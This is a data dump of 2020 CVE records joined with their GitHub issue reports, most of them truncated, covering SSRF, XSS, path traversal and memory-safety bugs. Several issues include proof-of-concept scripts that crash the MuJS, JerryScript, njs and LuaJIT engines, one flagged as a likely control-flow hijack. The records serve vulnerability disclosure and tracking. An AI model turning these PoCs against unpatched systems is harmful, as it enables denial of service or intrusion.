{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/prometheus/blackbox_exporter/issues/669" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://prometheus.io/docs/operating/security/#...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:prometheus:blackbox_exporter:*:*:*:*:*:*:*:*", "matchCriteriaId": "52D6034A-7D2F-4E19-ABF5-579ACAC6DC14", "versionEndExcluding": null, "versionEndIncluding": "0.17.0", "versi...
[ "918" ]
918
https://github.com/prometheus/blackbox_exporter/issues/669
[ "Exploit", "Third Party Advisory" ]
github.com
[ "prometheus", "blackbox_exporter" ]
SSRF Vulnerablity During the company's penetration test, it was found that the Blackbox > Exporter service was opened on the Internet, which led to the ssrf > detection of the company's internal network > > Set up the Blackbox Exporter test environment, and then visit: > > http://123.123.123.123:9115/probe?targe...
Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF.
https://api.github.com/repos/prometheus/blackbox_exporter/issues/669/comments
8
2020-08-03T02:20:15Z
2020-08-14T09:43:12Z
https://github.com/prometheus/blackbox_exporter/issues/669
671,747,939
669
1,373
CVE-2020-17479
2020-08-10T20:15:11.673
jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://blog.sonatype.com/cve-2020-17479" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/manvel-khnkoyan/jpv/commit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:json_pattern_validator_project:json_pattern_validator:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "4C1CCE0A-33EB-4196-A1CF-72CAD459CC70", "versionEndExcluding": "2.2.2", "versionEndInclud...
[ "20" ]
20
https://github.com/manvel-khnkoyan/jpv/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "manvel-khnkoyan", "jpv" ]
Hello, I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this GitHub issue?
Validation Bypass
https://api.github.com/repos/manvel-khnkoyan/jpv/issues/10/comments
3
2020-08-06T20:07:51Z
2020-08-19T10:37:57Z
https://github.com/manvel-khnkoyan/jpv/issues/10
674,570,517
10
1,374
CVE-2020-15071
2020-08-11T18:15:13.020
content/content.blueprintsevents.php in Symphony CMS 3.0.0 allows XSS via fields['name'] to appendSubheading.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/symphonycms/symphonycms/issues/2917" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getsymphony:symphony:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "8AE817F8-2BFA-44BD-ABB1-5F011285A168", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "79" ]
79
https://github.com/symphonycms/symphonycms/issues/2917
[ "Exploit", "Third Party Advisory" ]
github.com
[ "symphonycms", "symphonycms" ]
https://github.com/symphonycms/symphonycms/blob/master/symphony/content/content.blueprintsevents.php `$about = General::array_map_recursive('stripslashes', $existing->about());` .... .... .... `$this->appendSubheading(($isEditing ? $about['name'] : __('Untitled')))` .... .... .... ``` public function append...
XSS vulnerability
https://api.github.com/repos/symphonycms/symphonycms/issues/2917/comments
1
2020-06-18T01:57:47Z
2020-06-18T02:02:36Z
https://github.com/symphonycms/symphonycms/issues/2917
640,848,737
2,917
1,375
CVE-2020-17495
2020-08-11T21:15:10.943
django-celery-results through 1.2.1 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/celery/django-celery-results/issues/142" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/celery/django-cel...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:django-celery-results_project:django-celery-results:*:*:*:*:*:*:*:*", "matchCriteriaId": "41339B4A-04CD-4B0B-B108-06334AA4D183", "versionEndExcluding": null, "versionEndIncluding": "1.2....
[ "312" ]
312
https://github.com/celery/django-celery-results/issues/142
[ "Third Party Advisory" ]
github.com
[ "celery", "django-celery-results" ]
Hi, apologies if this is documented somewhere (I can't find it), but is there a quick way not to store the arguments that were passed to the celery task? Some of my tasks take in potentially sensitive information, and I would prefer not to have a permanent record of them inside of my database (I'm also looking at encry...
Question: Disable storing of task arguments
https://api.github.com/repos/celery/django-celery-results/issues/142/comments
16
2020-04-13T19:27:43Z
2022-07-09T19:59:02Z
https://github.com/celery/django-celery-results/issues/142
599,084,913
142
1,376
CVE-2020-24343
2020-08-13T19:15:13.677
Artifex MuJS through 1.0.7 has a use-after-free in jsrun.c because of unconditional marking in jsgc.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ccxvii/mujs/issues/136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:artifex:mujs:*:*:*:*:*:*:*:*", "matchCriteriaId": "CE48D58D-92C2-4D2E-88FA-EF18351637F5", "versionEndExcluding": null, "versionEndIncluding": "1.0.7", "versionStartExcluding"...
[ "416" ]
416
https://github.com/ccxvii/mujs/issues/136
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ccxvii", "mujs" ]
git hash: `9f3e141d805cddec7cce1fae38373a82c61e3300` cmd: `mujs poc.js` POC: ```javascript b = false function c() { if (!b) { function c() { this[a = this] = a} JSON.parse("[]", c) this[2] = a } b = true return this[Array(a = Array(1, 2, true) ,{})] = a } JSON....
AddressSanitizer: heap-use-after-free /home/yongheng/mujs/jsrun.c:1362 in jsR_run
https://api.github.com/repos/ccxvii/mujs/issues/136/comments
17
2020-06-28T19:13:31Z
2020-08-14T16:57:00Z
https://github.com/ccxvii/mujs/issues/136
646,987,460
136
1,377
CVE-2020-24344
2020-08-13T19:15:13.740
JerryScript through 2.3.0 has a (function({a=arguments}){const arguments}) buffer over-read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3976" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStar...
[ "125" ]
125
https://github.com/jerryscript-project/jerryscript/issues/3976
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript ( function ( { a = arguments }) { const arguments } ) ``` In debug build, it triggers an assertion 'scope_stack_p > context_p->scope_stack_p' failed ### Execution steps ./jerry poc.js ### Bui...
Heap overflow in jerry-core
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3976/comments
14
2020-07-05T20:43:50Z
2021-06-16T09:03:07Z
https://github.com/jerryscript-project/jerryscript/issues/3976
651,142,365
3,976
1,378
CVE-2020-24345
2020-08-13T19:15:13.807
JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse("[]",a). NOTE: the vendor states that the problem is the lack of the --stack-limit option
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3977" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStar...
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/3977
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript function a() { new new Proxy(a, {}) } JSON.parse("[]", a) ``` ### Execution steps ./jerry poc.js ### Build cmd python tools/build.py --compile-flag="-fsanitize=address" Stack dump: --- ``` ASAN:...
Stack overflow in ecma_is_lexical_environment
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3977/comments
2
2020-07-06T05:01:36Z
2024-09-03T10:11:11Z
https://github.com/jerryscript-project/jerryscript/issues/3977
651,247,064
3,977
1,379
CVE-2020-24346
2020-08-13T19:15:13.880
njs through 0.4.3, used in NGINX, has a use-after-free in njs_json_parse_iterator_call in njs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/325" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netap...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null...
[ "416" ]
416
https://github.com/nginx/njs/issues/325
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` POC: ```javascript function a() { this[this['use asm'] = this[this[1024] = ArrayBuffer]] = this[ArrayBuffer] = 4000 } JSON.parse("[1, 2, []]", a) ``` cmd: `njs poc.js` Stack dump: ``` =====================================...
heap-use-after-free in njs_json_parse_iterator_call
https://api.github.com/repos/nginx/njs/issues/325/comments
1
2020-06-28T18:40:42Z
2020-10-06T17:02:21Z
https://github.com/nginx/njs/issues/325
646,981,993
325
1,380
CVE-2020-24347
2020-08-13T19:15:13.943
njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_lvlhsh_level_find in njs_lvlhsh.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/323" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netap...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null...
[ "125" ]
125
https://github.com/nginx/njs/issues/323
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` POC: ```javascript var once = false ; var a = 1 ; function f ( ) { if ( this [ 8 ] = new Uint32Array ( this , this [ 8 ] , ) ) { a = new Array ( new Uint32Array ( a = new Array ( Array , 3 ) ) , { } , new ArrayBuffer ( this [ 8 ] ) , 2 , ...
Segfault in njs_lvlhsh_bucket_find
https://api.github.com/repos/nginx/njs/issues/323/comments
0
2020-06-27T19:58:35Z
2020-10-06T16:55:13Z
https://github.com/nginx/njs/issues/323
646,750,520
323
1,381
CVE-2020-24348
2020-08-13T19:15:14.003
njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_json_stringify_iterator in njs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/322" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netap...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null...
[ "125" ]
125
https://github.com/nginx/njs/issues/322
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` POC: ```javascript var array = []; var funky; funky = { get value() { array[10000000] = 12; } }; for (var i = 0; i < 10; i++) array[i] = i; array[3] = funky; '' == JSON.stringify(array); ``` cmd: `njs poc.js` Stack dump: ```...
Segfault in njs_json_stringify_iterator
https://api.github.com/repos/nginx/njs/issues/322/comments
0
2020-06-27T19:55:59Z
2020-10-06T17:53:12Z
https://github.com/nginx/njs/issues/322
646,750,084
322
1,382
CVE-2020-24349
2020-08-13T19:15:14.050
njs through 0.4.3, used in NGINX, allows control-flow hijack in njs_value_property in njs_value.c. NOTE: the vendor considers the issue to be "fluff" in the NGINX use case because there is no remote attack surface.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/416.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null...
[ "416" ]
416
https://github.com/nginx/njs/issues/324
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` This bug is likely exploitable. POC: ```javascript function a() { new Uint32Array(this[8] = a) return Array } JSON.parse("[1, 2, []]", a) ``` cmd: `njs poc.js` Stack dump: ``` #0 0x0000623000000cc0 in ?? () #1 0x000000000...
Control flow hijack in njs_value_property
https://api.github.com/repos/nginx/njs/issues/324/comments
5
2020-06-27T20:07:39Z
2020-10-06T16:56:40Z
https://github.com/nginx/njs/issues/324
646,752,255
324
1,383
CVE-2020-24372
2020-08-17T17:15:13.987
LuaJIT through 2.1.0-beta3 has an out-of-bounds read in lj_err_run in lj_err.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LuaJIT/LuaJIT/issues/603" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.co...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:luajit:luajit:*:*:*:*:*:*:*:*", "matchCriteriaId": "7369364F-A393-4616-B40E-8097CA70E957", "versionEndExcluding": null, "versionEndIncluding": "2.0.5", "versionStartExcluding...
[ "125" ]
125
https://github.com/LuaJIT/LuaJIT/issues/603
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LuaJIT", "LuaJIT" ]
Hi, we found a crash in LuaJit Version: 2.1. Git hash: `570e758ca7dd14f93efdd43d68cf8979c1d7f984` POC: ```lua function errfunc() print(xpcall(test, errfunc)) end function test(do_yield) mt = {} local t print(xpcall(test, errfunc)) function errfunc() end function test() end coroutine.wrap(function() en...
Second segfault in lj_err_run
https://api.github.com/repos/LuaJIT/LuaJIT/issues/603/comments
3
2020-07-14T01:15:30Z
2020-08-18T02:58:23Z
https://github.com/LuaJIT/LuaJIT/issues/603
656,251,924
603
1,384
CVE-2020-14934
2020-08-18T17:15:11.347
Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. If the number of variables in the request exceeds the allocated buffer, a mem...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1NIf0Y0S47Lu85uSi29kt9tgSh0jYZYfj/view?usp=sharing" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "031BDB59-5EDC-4D78-8E74-9432B766A874", "versionEndExcluding": null, "versionEndIncluding": "4.5", "versionStartExc...
[ "787" ]
787
https://github.com/contiki-ng/contiki-ng/issues/1352
[ "Exploit", "Third Party Advisory" ]
github.com
[ "contiki-ng", "contiki-ng" ]
### Description of defect **References:** https://github.com/contiki-ng/contiki-ng/tree/release/v4.5 https://github.com/contiki-ng/contiki-ng/tree/release/v4.4 **File:** [snmp-engine.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-engine.c) [snmp-message.c](https:/...
Buffer overflow in .bss section due to SNMP request overflow
https://api.github.com/repos/contiki-ng/contiki-ng/issues/1352/comments
1
2020-08-17T19:31:04Z
2020-11-25T18:28:24Z
https://github.com/contiki-ng/contiki-ng/issues/1352
680,475,979
1,352
1,386
CVE-2020-14935
2020-08-18T17:15:11.393
Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is ass...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "881B1086-BAE1-4159-B69E-E01EE3AB64DD", "versionEndExcluding": null, "versionEndIncluding": "4.5", "versionStartExc...
[ "787" ]
787
https://github.com/contiki-ng/contiki-ng/issues/1353
[ "Exploit", "Third Party Advisory" ]
github.com
[ "contiki-ng", "contiki-ng" ]
### Description of defect **References:** https://github.com/contiki-ng/contiki-ng/tree/release/v4.5 https://github.com/contiki-ng/contiki-ng/tree/release/v4.4 **File:** [snmp-engine.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-engine.c) [snmp-message.c](https://g...
Stack overflow in SNMP bulk request processing
https://api.github.com/repos/contiki-ng/contiki-ng/issues/1353/comments
1
2020-08-17T19:35:01Z
2023-04-16T06:01:07Z
https://github.com/contiki-ng/contiki-ng/issues/1353
680,478,148
1,353
1,387
CVE-2020-14936
2020-08-18T17:15:11.440
Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. Functions parsing the OIDs in SNMP requests lack sufficient allocated target-buffer capacity verification when writing parsed OID values. The function snmp_oid_decode_oid() may overwrite memory areas beyond the provided target buffer, wh...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1FypWH_g475jSL0mDFzquaATCeRIHQ2kj/view?usp=sharing" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/contiki-ng/conti...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "031BDB59-5EDC-4D78-8E74-9432B766A874", "versionEndExcluding": null, "versionEndIncluding": "4.5", "versionStartExc...
[ "787" ]
787
https://github.com/contiki-ng/contiki-ng/issues/1351
[ "Third Party Advisory" ]
github.com
[ "contiki-ng", "contiki-ng" ]
### Description of defect **References:** https://github.com/contiki-ng/contiki-ng/tree/release/v4.5 https://github.com/contiki-ng/contiki-ng/tree/release/v4.4 **File:** [snmp-oid.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-oid.c) **Analysis:** Memory access o...
Out of bounds memory read/write in SNMP agent
https://api.github.com/repos/contiki-ng/contiki-ng/issues/1351/comments
1
2020-08-17T19:24:47Z
2020-11-25T18:28:24Z
https://github.com/contiki-ng/contiki-ng/issues/1351
680,472,406
1,351
1,388
CVE-2020-24381
2020-08-19T12:15:11.340
GUnet Open eClass Platform (aka openeclass) before 3.11 might allow remote attackers to read students' submitted assessments because it does not ensure that the web server blocks directory listings, and the data directory is inside the web root by default.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://emaragkos.gr/cve-2020-24381/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gunet/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gunet:open_eclass_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "59A23733-2777-4642-A2E1-35AC63B031A3", "versionEndExcluding": "3.11", "versionEndIncluding": null, "versionSt...
[ "200" ]
200
https://github.com/gunet/openeclass/issues/39
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gunet", "openeclass" ]
**Improper Access Control by Directory Listing Misconfiguration that affects all versions** When the webapp is poorly configured (directory listing is enabled), an unauthenticated remote attacker will be able to read students' submitted assessments because it does not ensure that the web server blocks directory list...
Improper Access Control by Directory Listing Misconfiguration
https://api.github.com/repos/gunet/openeclass/issues/39/comments
7
2020-08-17T16:03:50Z
2021-05-23T21:16:23Z
https://github.com/gunet/openeclass/issues/39
680,346,433
39
1,389
CVE-2020-24368
2020-08-19T15:15:12.620
Icinga Icinga Web2 2.0.0 through 2.6.4, 2.7.4 and 2.8.2 has a Directory Traversal vulnerability which allows an attacker to access arbitrary files that are readable by the process running Icinga Web 2. This issue is fixed in Icinga Web 2 in v2.6.4, v2.7.4 and v2.8.2.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00026.html" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url":...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*", "matchCriteriaId": "ECF58CFB-8102-44AC-8089-05199B4B751C", "versionEndExcluding": "2.6.4", "versionEndIncluding": null, "versionStartExc...
[ "22" ]
22
https://github.com/Icinga/icingaweb2/issues/4226
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Icinga", "icingaweb2" ]
The vulnerability in question allows an attacker to access arbitrary files which are readable by the process running Icinga Web 2. (This is usually the web server or fpm process) To exploit this vulnerability the attacker has to acquire the following knowledge: - The URI at which Icinga Web 2 is accessible - An ...
Possible path traversal when serving static image files
https://api.github.com/repos/Icinga/icingaweb2/issues/4226/comments
0
2020-08-14T12:33:43Z
2020-08-19T09:02:24Z
https://github.com/Icinga/icingaweb2/issues/4226
679,127,062
4,226
1,390
CVE-2020-15861
2020-08-20T01:17:13.837
Net-SNMP through 5.7.3 allows Escalation of Privileges because of UNIX symbolic link (symlink) following.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE",...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966599" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/net...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:net-snmp:net-snmp:*:*:*:*:*:*:*:*", "matchCriteriaId": "8BD5C233-45FA-4501-8EA4-C28EC33E7460", "versionEndExcluding": null, "versionEndIncluding": "5.7.3", "versionStartExclu...
[ "59" ]
59
https://github.com/net-snmp/net-snmp/issues/145
[ "Third Party Advisory" ]
github.com
[ "net-snmp", "net-snmp" ]
Dear all, In the course of a penetration test performed by our security analysts, we have noticed some security vulnerabilities in net-snmp. Your deprecated bug tracker (http://www.net-snmp.org/bugs/) redirects to Github. Sadly, Github does not support creating private issues for security relevant bugs. We wou...
[Ticket#2020070701000015] Security issues in net-snmp
https://api.github.com/repos/net-snmp/net-snmp/issues/145/comments
8
2020-07-09T09:32:21Z
2020-09-21T04:05:51Z
https://github.com/net-snmp/net-snmp/issues/145
653,914,163
145
1,391
CVE-2020-10283
2020-08-20T09:15:11.140
The Micro Air Vehicle Link (MAVLink) protocol presents authentication mechanisms on its version 2.0 however according to its documentation, in order to maintain backwards compatibility, GCS and autopilot negotiate the version via the AUTOPILOT_VERSION message. Since this negotiation depends on the answer, an attacker m...
